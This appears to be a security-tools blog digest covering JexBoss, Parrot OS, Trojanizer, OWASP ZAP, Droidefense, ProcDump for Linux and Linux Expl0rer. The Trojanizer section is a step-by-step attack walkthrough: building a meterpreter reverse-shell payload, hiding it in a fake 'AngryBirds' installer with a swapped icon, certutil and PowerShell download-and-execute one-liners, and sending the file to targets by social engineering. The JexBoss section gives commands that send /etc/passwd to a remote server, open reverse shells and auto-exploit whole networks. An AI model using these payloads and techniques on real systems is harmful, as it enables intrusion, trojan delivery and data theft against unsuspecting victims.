JBoss (and others Java Deserialization Vulnerabilities) verify and EXploitation Tool - JexBoss

JexBoss is a tool for testing and exploiting vulnerabilities in JBoss Application Server and others Java Platforms, Frameworks, Applications, etc.

Requirements

• Python >= 2.7.x
• urllib3
• ipaddress

Installation on Linux\Mac
To install the latest version of JexBoss, please use the following commands:

git clone https://github.com/joaomatosf/jexboss.git
cd jexboss
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

OR:

Download the latest version at: https://github.com/joaomatosf/jexboss/archive/master.zip
unzip master.zip
cd jexboss-master
pip install -r requires.txt
python jexboss.py -h
python jexboss.py -host http://target_host:8080

If you are using CentOS with Python 2.6, please install Python2.7. Installation example of the Python 2.7 on CentOS using Collections Software scl:

yum -y install centos-release-scl
yum -y install python27
scl enable python27 bash

Installation on Windows
If you are using Windows, you can use the Git Bash to run the JexBoss. Follow the steps below:

• Download and install Python
• Download and install Git for Windows
• After installing, run the Git for Windows and type the following commands:

    PATH=$PATH:C:\Python27\
    PATH=$PATH:C:\Python27\Scripts
    git clone https://github.com/joaomatosf/jexboss.git
    cd jexboss
    pip install -r requires.txt
    python jexboss.py -h
    python jexboss.py -host http://target_host:8080
    

Features
The tool and exploits were developed and tested for:

• JBoss Application Server versions: 3, 4, 5 and 6.
• Java Deserialization Vulnerabilities in multiple java frameworks, platforms and applications (e.g., Java Server Faces - JSF, Seam Framework, RMI over HTTP, Jenkins CLI RCE (CVE-2015-5317), Remote JMX (CVE-2016-3427, CVE-2016-8735), etc)

The exploitation vectors are:

• /admin-console
  • tested and working in JBoss versions 5 and 6
• /jmx-console
  • tested and working in JBoss versions 4, 5 and 6
• /web-console/Invoker
  • tested and working in JBoss versions 4, 5 and 6
• /invoker/JMXInvokerServlet
  • tested and working in JBoss versions 4, 5 and 6
• Application Deserialization
  • tested and working against multiple java applications, platforms, etc, via HTTP POST Parameters
• Servlet Deserialization
  • tested and working against multiple java applications, platforms, etc, via servlets that process serialized objets (e.g. when you see an "Invoker" in a link)
• Apache Struts2 CVE-2017-5638
  • tested in Apache Struts 2 applications
• Others

Videos

• Exploiting Java Deserialization Vulnerabilities (RCE) on JSF/Seam Applications via javax.faces.ViewState with JexBoss

• Exploiting JBoss Application Server with JexBoss

• Exploiting Apache Struts2 (RCE) with Jexboss (CVE-2017-5638)

Screenshots

• Simple usage examples:

$ python jexboss.py

• Example of standalone mode against JBoss:

$ python jexboss.py -u http://192.168.0.26:8080

• Usage modes:

$ python jexboss.py -h

• Network scan mode:

$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080 -results results.txt

• Network scan with auto-exploit mode:

$ python jexboss.py -mode auto-scan -A -network 192.168.0.0/24 -ports 8080 -results results.txt

• Results and recommendations:

Reverse Shell (meterpreter integration)
After you exploit a JBoss server, you can use the own jexboss command shell or perform a reverse connection using the following command:

   jexremote=YOUR_IP:YOUR_PORT

   Example:
     Shell>jexremote=192.168.0.10:4444

• Example:

When exploiting java deserialization vulnerabilities (Application Deserialization, Servlet Deserialization), the default options are: make a reverse shell connection or send a commando to execute.

Usage examples

• For Java Deserialization Vulnerabilities in a custom HTTP parameter and to send a custom command to be executed on the exploited server:

$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name --cmd 'curl [email protected]/etc/passwd http://your_server'

• For Java Deserialization Vulnerabilities in a custom HTTP parameter and to make a reverse shell (this will ask for an IP address and port of your remote host):

$ python jexboss.py -u http://vulnerable_java_app/page.jsf --app-unserialize -H parameter_name

• For Java Deserialization Vulnerabilities in a Servlet (like Invoker):

$ python jexboss.py -u http://vulnerable_java_app/path --servlet-unserialize

• For Apache Struts 2 (CVE-2017-5638)

$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2

• For Apache Struts 2 (CVE-2017-5638) with cookies for authenticated resources

$ python jexboss.py -u http://vulnerable_java_struts2_app/page.action --struts2 --cookies "JSESSIONID=24517D9075136F202DCE20E9C89D424D"

• Auto scan mode:

$ python jexboss.py -mode auto-scan -network 192.168.0.0/24 -ports 8080,80 -results report_auto_scan.log

• File scan mode:

$ python jexboss.py -mode file-scan -file host_list.txt -out report_file_scan.log

• More Options:

optional arguments:
  -h, --help            show this help message and exit
  --version             show program's version number and exit
  --auto-exploit, -A    Send exploit code automatically (USE ONLY IF YOU HAVE
                        PERMISSION!!!)
  --disable-check-updates, -D
                        Disable two updates checks: 1) Check for updates
                        performed by the webshell in exploited server at
                        http://webshell.jexboss.net/jsp_version.txt and 2)
                        check for updates performed by the jexboss client at
                        http://joaomatosf.com/rnp/releases.txt
  -mode {standalone,auto-scan,file-scan}
                        Operation mode (DEFAULT: standalone)
  --app-unserialize, -j
                        Check for java unserialization vulnerabilities in HTTP
                        parameters (eg. javax.faces.ViewState, oldFormData,
                        etc)
  --servlet-unserialize, -l
                        Check for java unserialization vulnerabilities in
                        Servlets (like Invoker interfaces)
  --jboss               Check only for JBOSS vectors.
  --jenkins             Check only for Jenkins CLI vector.
  --jmxtomcat           Check JMX JmxRemoteLifecycleListener in Tomcat
                        (CVE-2016-8735 and CVE-2016-8735). OBS: Will not be
                        checked by default.
  --proxy PROXY, -P PROXY
                        Use a http proxy to connect to the target URL (eg. -P
                        http://192.168.0.1:3128)
  --proxy-cred LOGIN:PASS, -L LOGIN:PASS
                        Proxy authentication credentials (eg -L name:password)
  --jboss-login LOGIN:PASS, -J LOGIN:PASS
                        JBoss login and password for exploit admin-console in
                        JBoss 5 and JBoss 6 (default: admin:admin)
  --timeout TIMEOUT     Seconds to wait before timeout connection (default 3)

Standalone mode:
  -host HOST, -u HOST   Host address to be checked (eg. -u
                        http://192.168.0.10:8080)

Advanced Options (USE WHEN EXPLOITING JAVA UNSERIALIZE IN APP LAYER):
  --reverse-host RHOST:RPORT, -r RHOST:RPORT
                        Remote host address and port for reverse shell when
                        exploiting Java Deserialization Vulnerabilities in
                        application layer (for now, working only against *nix
                        systems)(eg. 192.168.0.10:1331)
  --cmd CMD, -x CMD     Send specific command to run on target (eg. curl -d
                        @/etc/passwd http://your_server)
  --windows, -w         Specifies that the commands are for rWINDOWS System$
                        (cmd.exe)
  --post-parameter PARAMETER, -H PARAMETER
                        Specify the parameter to find and inject serialized
                        objects into it. (egs. -H javax.faces.ViewState or -H
                        oldFormData (<- Hi PayPal =X) or others) (DEFAULT:
                        javax.faces.ViewState)
  --show-payload, -t    Print the generated payload.
  --gadget {commons-collections3.1,commons-collections4.0,groovy1}
                        Specify the type of Gadget to generate the payload
                        automatically. (DEFAULT: commons-collections3.1 or
                        groovy1 for JenKins)
  --load-gadget FILENAME
                        Provide your own gadget from file (a java serialized
                        object in RAW mode)
  --force, -F           Force send java serialized gadgets to URL informed in
                        -u parameter. This will send the payload in multiple
                        formats (eg. RAW, GZIPED and BASE64) and with
                        different Content-Types.

Auto scan mode:
  -network NETWORK      Network to be checked in CIDR format (eg. 10.0.0.0/8)
  -ports PORTS          List of ports separated by commas to be checked for
                        each host (eg. 8080,8443,8888,80,443)
  -results FILENAME     File name to store the auto scan results

File scan mode:
  -file FILENAME_HOSTS  Filename with host list to be scanned (one host per
                        line)
  -out FILENAME_RESULTS
                        File name to store the file scan results

Download JexBoss

Read More

Security Oriented GNU/Linux Distribution - Parrot Security 3.10

Security GNU/Linux distribution designed with cloud pentesting and IoT security in mind.

It includes a full portable laboratory for security and digital forensics experts, but it also includes all you need to develop your own softwares or protect your privacy with anonymity and crypto tools.

Details

Security

Parrot Security includes a full arsenal of security oriented tools to perform penetration tests, security audits and more. With a Parrot usb drive in your pocket you will always be sure to have all you need with you.

Privacy

Parrot includes by default TOR, I2P, anonsurf, gpg, tccf, zulucrypt, veracrypt, truecrypt, luks and many other tecnologies designed to defend your privacy and your identity.

Development

If you need a comfortable environment with updated frameworks and useful libraries already installed, Parrot will amaze you as it includes a full development-oriented environment with some powerful editors and IDEs pre-installed and many other tools installable from our repository.

Features

System Specs

• Debian GNU/Linux 9 (stretch)
• Custom hardened Linux 4.8 kernel
• Rolling release updates
• Powerful worldwide mirror servers
• High hardware compatibility
• Community-driven development
• free(libre) and open source project

Cryptography

Parrot includes many cryptographic softwares which are extremely useful when it comes to protect your confidential data and defend your privacy.

Parrot includes several cryptographic front-ends to work both with symmetric and asymmetric encryption, infact it natively supports volumes encryption with LUKS, TrueCrypt, VeraCrypt and the hidden TrueCrypt/VeraCrypt volumes with nested algorythms support.

The whole system can be installed inside an encrypted partition to protect your computer in case of theft.

Another swiss army knife of your privacy is GPG, the GNU Privacy Guard, an extremely powerful PGP software that lets you create a private/public pair of keys to apply digital signatures to your messages and to allow other people to send you encrypted messages that only your private key can decrypt, in can also handle multiple identities and subkeys, and its power resides in its ring of trust as PGP users can sign each other's keys to make other people know if a digital identity is valid or not.

Even our software repository is digitally signed by GPG, and the system automatically verifies if an update was altered or compromised and it refuses to upgrade or to install new software if our digital signature is not found or not valid.

Privacy

Your privacy is the most valuable thing you have in your digital life and the whole Parrot Team is exaggeratedly paranoid when it comes to users privacy, infact our system doesn't contain tracking systems, and it is hardened in deep to protect users from prying eyes.

Parrot has developed and implemented several tricks and softwares to achieve this goal, and AnonSurf is one of the most important examples, it is a software designed to start TOR and hijack all the internet traffic made by the system through the TOR network, we have also modified the system to make it use DNS servers different from those offered by your internet provider.

Parrot also includes torbrowser, torchat and other anonymous services, like I2P, a powerful alternative to TOR.

Programming

The main goal of an environment designed by hackers for hackers is the possibility to change it, adapt it, transform it and use it as a development platform to create new things, this is why Parrot comes out of the box with several tools for developers such as compilers, disassemblers, IDEs, comfortable editors and powerful frameworks.

Parrot includes QTCreator as its main C, C++ and Qt framework. Another very useful tool is Geany, a lightweight and simple IDE which supports a huge amount of programming languages, while we also include Atom, the opensource editor of the future developed by GitHub, and many compilers and interpreters with their most important libraries are pre-installed and ready to use.

And of course many other editors, development softwares and libraries are available through our software repository where we keep all the development tools always updated to their most cutting edge but reliable version.

Changelog

The first big news is the introduction of a full firejail+apparmor sandboxing system to proactively protect the OS by isolating its components with the combination of different tecniques. The first experiments were already introduced in Parrot 3.9 with the inclusion of firejail.

In Parrot 3.10 also introduced the new Firefox 57 (Quantum) that landed on Parrot very naturally with a complete browser restyle.


The other big news is the introduction of the latest Linux 4.14 kernel, and it is a very important improvement for us because of the awesome features of this new kernel release and its improved hardware support.

Some pentest tools received some important upstream updates, like metasploit-framework, that reached its 4.21 version, or maltegoce and casefile that were merged into a unique launcher provided by the new maltego 4.1.

To upgrade the system, open a terminal window and type the following command

sudo apt update && sudo apt full-upgrade

Download Parrot 3.10

Read More

Trojanize Your Payload (WinRAR [SFX] Automatization) - Trojanizer

The Trojanizer tool uses WinRAR (SFX) to compress the two files input by user, and transforms it into an SFX executable(.exe) archive. The sfx archive when executed it will run both files (our payload and the legit appl at the same time).

To make the archive less suspicious to target at execution time, trojanizer will try to replace the default icon(.ico) of the sfx file with a user-selected one, and supress all SFX archive sandbox msgs (Silent=1 | Overwrite=1).

Trojanizer will not build trojans, but from target perspective, it replicates the trojan behavior'

(execute the payload in background, while the legit application executes in foreground).

DEPENDENCIES (backend applications)

Zenity (bash-GUIs) | Wine (x86|x64) | WinRAr.exe (installed-in-wine)
"Trojanizer.sh will download/install all dependencies as they are needed"

It is recomended to edit and config the option: SYSTEM_ARCH=[ your_sys_arch ] in the 'settings' file before attempting to run the tool for the first time.

PAYLOADS (agents) ACCEPTED

.exe | .bat | .vbs | .ps1
"All payloads that windows/SFX can auto-extract-execute"

HINT: If sellected 'SINGLE_EXEC=ON' in the settings file, then trojanizer will accept any kind of extension to be inputed.

LEGIT APPLICATIONS ACCEPTED (decoys)

.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
"All applications that windows/SFX can auto-extract-execute"

ADVANCED SETTINGS

Trojanizer 'advanced options' are only accessible in the 'settings' file, and they can only be configurated before running the main tool (Trojanizer.sh)

-- Presetup advanced option

Trojanizer can be configurated to execute a program + command before the extraction/execution of the two compressed files (SFX archive). This allow users to take advantage of pre-installed software to execute a remote command before the actual extraction occurs in target system. If active, trojanizer will asks (zenity sandbox) for the command to be executed 

-- single_file_execution

Lets look at the follow scenario: You have a dll payload to input that you need to execute upon extraction, but sfx archives can not execute directly dll files, This setting allow users to input one batch script(.bat) that its going to be used to execute the dll payload. All that Trojanizer needs to Do its to instruct the SFX archive to extract both files and them execute the script.bat 

single_file_execution switch default behavior its to compress the two files inputed by user but only execute one of them at extraction time (the 2º file inputed will be executed) ...

TROJANIZER AND APPL WHITELISTING BYPASSES

A lot of awesome work has been done by a lot of people, especially @subTee, regarding  application whitelisting bypass, which is eventually what we want here: execute arbitrary code abusing Microsoft built-in binaries. Windows oneliners to download remote payload and execute arbitrary code

The follow exercise describes how to use trojanizer 'single_file_execution' and 'Presetup' advanced switchs to drop (remote download) and execute any payload using 'certutil' or 'powershell' appl_whitelisting_bypass oneliners ...

1º - use metasploit to build our payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe

2º - copy payload.exe to apache2 webroot and start service

cp payload.exe /var/www/html/payload.exe
service apache2 start

3º - edit Trojanizer 'settings' file and activate:

PRE_SETUP=ON
SINGLE_EXEC=ON

4º - running trojanizer tool

PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f 'http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe'; Start-Process '%TEMP%\\payload.exe'
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico

5º - start a listenner, and send the sfx archive to target using social enginnering

msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'

When the sfx archive its executed, it will download payload.exe from our apache2 webserver to target and execute it before extract 'screenshot.png' and 'AngryBirds.exe' (last one will be executed to serve as decoy)

The follow oneliner uses 'powershell(Downloadfile+start)' method to achieve the same as previous 'certutil' exercise ..

cmd.exe /c powershell.exe -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://192.168.1.69/payload.exe', '%TEMP%\\payload.exe') & start '%TEMP%\\payload.exe'

The follow oneliner uses 'powershell(IEX+downloadstring)' method to achieve allmost the same (payload.ps1 does not touch disk)

cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"

DOWNLOAD/INSTALL

1º - Download framework from github
     git clone https://github.com/r00t-3xp10it/trojanizer.git

2º - Set files execution permitions
     cd trojanizer
     sudo chmod +x *.sh

3º - config framework
     nano settings

4º - Run main tool
     sudo ./Trojanizer.sh

Framework Screenshots

xsf.conf - execute both files upon extraction (trojan behavior)

xsf.conf - single_file_execution + Presetup (advanced options)

xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (certutil)

xsf.conf - single_file_execution + Presetup + appl_whitelisting_bypass (powershell IEX)

Final sfx archive with icon changed

Inside the sfx archive (open with winrar) - trojan behavior

Inside the sfx archive (open with winrar) - single_file_execution

Video tutorials

Trojanizer - single_file_execution (not trojan behavior)

Trojanizer - AVG anti-virus fake installer (trojan behavior)

Download Trojanizer

Read More

Penetration Testing Tool for Testing Web Applications - OWASP ZAP 2.7.0

The OWASP Zed Attack Proxy (ZAP) is one of the world’s most popular free security tools and is actively maintained by hundreds of international volunteers*. It can help you automatically find security vulnerabilities in your web applications while you are developing and testing your applications. Its also a great tool for experienced pentesters to use for manual security testing.

For general information about ZAP:

• Home page - the official ZAP page on the OWASP wiki (includes a donate button;)
• Twitter - official ZAP announcements (low volume)
• Blog - official ZAP blog
• Monthly Newsletters - ZAP news, tutorials, 3rd party tools and featured contributors
• Swag! - official ZAP swag that you can buy, as well as all of the original artwork released under the CC License

For help using ZAP:

• Getting Started Guide (pdf) - an introductory guide you can print
• Tutorial Videos
• Articles - that go into ZAP features in more depth
• Frequently Asked Questions
• User Guide - online version of the User Guide included with ZAP
• User Group - ask questions about using ZAP
• IRC: irc.mozilla.org #websectools (eg using Mibbit) - chat with core ZAP developers (European office hours usually best)
• Add-ons - help for the optional add-ons you can install
• StackOverflow - because some people use this for everything ;)

Information about the official ZAP Jenkins plugin:

• Wiki
• Group
• Issue tracker
• Source code

To learn more about ZAP development:

• Source Code - for all of the ZAP related projects
• Wiki - lots of detailed info
• Developer Group - ask questions about the ZAP internals
• Crowdin (GUI) - help translate the ZAP GUI
• Crowdin (User Guide) - help translate the ZAP User Guide
• OpenHub - FOSS analytics
• BountySource - Vote on ZAP issues (you can also donate money here, but 10% taken out)
• Bug Bounty Program - please use this to report any potential vulnerabilities you find in ZAP

Download zaproxy

Read More

Advance Android Malware Analysis Framework - Droidefense

Droidefense (originally named atom: analysis through observation machine)* is the codename for android apps/malware analysis/reversing tool. It was built focused on security issues and tricks that malware researcher have on they every day work. For those situations on where the malware has anti-analysis routines, Droidefense attemps to bypass them in order to get to the code and 'bad boy' routine. Sometimes those techniques can be virtual machine detection, emulator detection, self certificate checking, pipes detection. tracer pid check, and so on.

Droidefense uses an innovative idea in where the code is not decompiled rather than viewed. This allow us to get the global view of the execution workflow of the code with a 100% accuracy on gathered information. With this situation, Droidefense generates a fancy html report with the results for an easy understanding.

Usage

TL;DR

java -jar droidefense-cli-1.0-SNAPSHOT.jar -i /path/to/your/sample.apk

Detailed usage

java -jar droidefense-cli-1.0-SNAPSHOT.jar

________               .__    .___      _____                            
\______ \_______  ____ |__| __| _/_____/ ____\____   ____   ______ ____  
 |    |  \_  __ \/  _ \|  |/ __ |/ __ \   __\/ __ \ /    \ /  ___// __ \ 
 |    `   \  | \(  <_> )  / /_/ \  ___/|  | \  ___/|   |  \\___ \\  ___/ 
/_______  /__|   \____/|__\____ |\___  >__|  \___  >___|  /____  >\___  >
        \/                     \/    \/          \/     \/     \/     \/ 


 * Current build:    2017_12_05__12_07_01
 * Check out on Github:    https://github.com/droidefense/
 * Report your issue:    https://github.com/droidefense/engine/issues
 * Lead developer:    @zerjioang

usage: droidefense
 -d,--debug                 print debugging information
 -h,--help                  print this message
 -i,--input <apk>           input .apk to be analyzed
 -o,--output <format>       select prefered output:
                            json
                            json.min
                            html
 -p,--profile               Wait for JVM profiler
 -s,--show                  show generated report after scan
 -u,--unpacker <unpacker>   select prefered unpacker:
                            zip
                            memapktool
 -v,--verbose               be verbose
 -V,--version               show current version information
 

Useful info

• Checkout how to compile new version at:
  • https://github.com/droidefense/engine/wiki/Compilation
• Checkout report example at:
  • https://github.com/droidefense/engine/wiki/Pornoplayer-report
• Checkout execution logs at:
  • https://github.com/droidefense/engine/wiki/Execution-logs

Download Droidefense

Read More

A Linux version of the ProcDump Sysinternals tool - ProcDump for Linux

ProcDump is a Linux reimagining of the classic ProcDump tool from the Sysinternals suite of tools for Windows. ProcDump provides a convenient way for Linux developers to create core dumps of their application based on performance triggers.

Installation & Usage

Requirements

• Minimum OS: Ubuntu 14.04 LTS (Desktop or Server)
  • We are actively testing against other Linux distributions. If you have requests for specific distros, please let us know (or create a pull request with the necessary changes).
• gdb (>=7.7.1)

Install ProcDump

Via Package Manager [prefered method]

1. Add the Microsoft Product feed

curl https://packages.microsoft.com/keys/microsoft.asc | gpg --dearmor > microsoft.gpg
sudo mv microsoft.gpg /etc/apt/trusted.gpg.d/microsoft.gpg

Register the Microsoft Product feed

Ubuntu 16.04

sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-ubuntu-xenial-prod xenial main" > etc/apt/sources.list.d/microsoft.list'

Ubuntu 14.04

sudo sh -c 'echo "deb [arch=amd64] https://packages.microsoft.com/repos/microsoft-ubuntu-trusty-prod trusty main" > /etc/apt/sources.list.d/microsoft.list'

2. Install Procdump

sudo apt-get update
sudo apt-get install procdump

Via .deb Package

Pre-Depends: dpkg(>=1.17.5)

1. Download .deb Package

Ubuntu 16.04

wget https://packages.microsoft.com/repos/microsoft-ubuntu-xenial-prod/pool/main/p/procdump/procdump_1.0_amd64.deb

Ubuntu 14.04

wget https://packages.microsoft.com/repos/microsoft-ubuntu-trusty-prod/pool/main/p/procdump/procdump_1.0_amd64.deb

2. Install Procdump

sudo dpkg -i procdump_1.0_amd64.deb
sudo apt-get -f install

Uninstall

Ubuntu 14.04+

sudo apt-get purge procdump

Usage

Usage: procdump [OPTIONS...] TARGET
   OPTIONS
      -C          CPU threshold at which to create a dump of the process from 0 to 200
      -c          CPU threshold below which to create a dump of the process from 0 to 200
      -M          Memory commit threshold in MB at which to create a dump
      -m          Trigger when memory commit drops below specified MB value.
      -n          Number of dumps to write before exiting
      -s          Consecutive seconds before dump is written (default is 10)
   TARGET must be exactly one of these:
      -p          pid of the process

Examples

The following examples all target a process with pid == 1234

The following will create a core dump immediately.

sudo procdump -p 1234

The following will create 3 core dumps 10 seconds apart.

sudo procdump -n 3 -p 1234

The following will create 3 core dumps 5 seconds apart.

sudo procdump -n -s 5 -p 1234

The following will create a core dump each time the process has CPU usage >= 65%, up to 3 times, with at least 10 seconds between each dump.

sudo procdump -C 65 -n 3 -p 1234

The following with create a core dump each time the process has CPU usage >= 65%, up to 3 times, with at least 5 seconds between each dump.

sudo procdump -C 65 -n 3 -s 5 -p 1234

The following will create a core dump when CPU usage is outside the range [10,65].

sudo procdump -c 10 -C 65 -p 1234

The following will create a core dump when CPU usage is >= 65% or memory usage is >= 100 MB.

sudo procdump -C 65 -M 100 -p 1234

Download ProcDump-for-Linux

Read More

Easy-To-Use Live Forensics Toolbox For Linux Endpoints - Linux Expl0rer

Easy-to-use live forensics toolbox for Linux endpoints written in Python & Flask.

Capabilities

ps

• View full process list
• Inspect process memory map & fetch memory strings easly
• Dump process memory in one click
• Automaticly search hash in public services
  • VirusTotal
  • AlienVault OTX

users

• users list

find

• Search for suspicious files by name/regex

netstat

• Whois

logs

• syslog
• auth.log(user authentication log)
• ufw.log(firewall log)
• bash history

anti-rootkit

• chkrootkit

yara

• Scan a file or directory using YARA signatures by @Neo23x0
• Scan a running process memory address space
• Upload your own YARA signature

Requirements

• Python 2.7
• YARA
• chkrootkit

Installation

1. Clone repository

git clone https://github.com/intezer/linux_expl0rer

2. Install required packages

pip install -r requirements.txt

3. Setup VT/OTX api keys

nano config.py

Edit following lines:

VT_APIKEY = '<key>'
OTX_APIKEY = '<key>'

4. Install YARA

sudo apt-get install yara

5. Install chkrootkit

sudo apt-get install chkrootkit

Start Linux Expl0rer server

sudo python linux_explorer.py

Usage

1. Start your browser

firefox http://127.0.0.1:8080

2. do stuff

Notes

• We recommend using NGINX reverse proxy with basic http auth & ssl for secure remote access
• Tested with Ubuntu 16.04

Download Linux Expl0rer

Read More